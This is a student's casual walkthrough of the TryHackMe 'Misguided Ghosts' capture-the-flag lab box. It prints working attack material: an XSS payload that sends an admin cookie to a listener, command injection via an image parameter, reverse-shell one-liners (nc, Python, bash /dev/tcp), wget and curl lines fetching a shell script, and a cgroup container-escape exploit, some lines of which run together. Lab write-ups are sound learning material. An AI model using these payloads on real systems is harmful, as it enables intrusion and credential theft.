Misguided Ghosts CTF Tryhackme Write-up
Explore your inner daemons with this hard box!
Hey all!
I am Arunkumar R student trying to be a security researcher, you can find me under this username: 0xarun, This my second CTF write-up, I’m doing CTF’s Tryhackme for the past few months! i learn lot of stuffs finally done this box!
Let’s get start!
Starts with Nmap scan!
yeah we got 2 open ports and too had ftp anonymous login! lets login with ftp!
ahhhh, after login found pub directory enter into this then ls we got some text files here then get this files to local machine!
huehueee! things like knock knock is port knocking yeahhh! lets try port knocking! ahhh, let’s install knock with this cmd!
apt install knockd
after install knockd run this like
knock 10.10.122.226 7864 8273 9241 12007 60753
Those ports are I’m identified in wireshark.
After did this scan Nmap!
nmap -p 8080 -sC -sV 10.10.122.226
if you perfectly done! Port knocking you got Nmap results like this given above.
lets! open webpage!
Ahhh gooood, someone singing well :P
lets do dir brute-force with gobuster I’m found directory as /login
Here! I tried to login with username and passwords like paramore:paramore, josh:josh, zac:zac and so on. And I finally get in with zac:zac.
lets login with zac;zac
Ahhhh yeah we logged in! here’s hint like “admin will check every two minutes so don’t be rude!” Hint for Xss
lets i did some hulu xss payloads like see below
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
But bad luck this payloads not works :( ahhh wtf
After a while I got works payload like given below
<scrscriptipt> alert('xss') </scscriptript>
Yeah popup, lets go for admins cookie hoooo cookie’s yummyyy…lets hunt the cookies!
Run python listener! pyhton -m SimpleHTTPServer 9001
lets i use this payload get it this form another mate write up :D
<scrscriptipt> document.location='http://10.9.172.114:9001/XSS/grabber.php?c='+document.cookie </scrscriptipt>
uhhhh, lets check out python listener!
Hooohooo we got admins! cookieeee lets eat!
Login with admins cookie by session simply open inspect element>storage>Cookie just change that “older_cookie” to “admin_cookie” like
After change just reload the page! then logged in as admin Hayley yeah great! ahh
lets move Dir brute-force with admins cookie! with help of gobuster
gobuster dir -t 50 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.122.226:8080 -c “admin_cookie” -k 2>/dev/null
Ahhh, In this brute force on fire 🔥we got photos directory interesting!
This upload feature may anything interesting here go for it, I’m try some bash file to upload! badly not been uploaded, but luckily got parameter like ?image= with this we made code execution hooooo! ☺
The /etc/passwd;id successfully code executed!
Now try for upload shell.sh yeah the code for shell given below
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.172.114 9001 >/tmp/f
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.9.172.114”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.9.172.114”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
bash -i >& /dev/tcp/10.9.172.114/9001 0>&1
Yeahh dont forget to edit ip after edit save this code as shell.sh
After saved then Run python listsner! pyhton -m SimpleHTTPServer
Upload that saved shell with this cmd
/photos?image=/etc/passwd;CMD=$'\x20wget\x2010.6.31.213:8000/shell.sh';`$CMD`
After that check python listener
yeahhh we made it! succesfully shell uploaded!
Then run Netcat reverse listner
nc -nvlp 9001
Now run shell.sh with this cmds
/photos?image=/etc/passwd;CMD=$'\x20sh\x20shell.sh';`$CMD`
what lets check Netcat listener
Huuu got it! yeah Time to Privilege Escalation
Nothing interesting! :( Move to /home/zac/notes
Ohhh this id_rsa has been ciphered text!
Haaaa, this chiper text just leave it we go to aother way to exploit it like here runnig docker hoo next we enter some cmds then with this to get root shell
run Netcat reverse listner on local machine
nc -nlvp 9001
Exploit by this given code below
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_releasehost_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agentecho '#!/bin/sh' > /cmdecho 'curl 10.6.31.213:8000/shell.sh -o /dev/shm/shell.sh' >> /cmd
echo 'chmod +x /dev/shm/shell.sh' >> /cmd
echo 'sh /dev/shm/shell.sh' >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Yeah finally done check the Netcat reverse listener!
yeah we got rooooooooooooot
yeahhhh all done! Tooooo tried tadaaaaaa
Thank you!
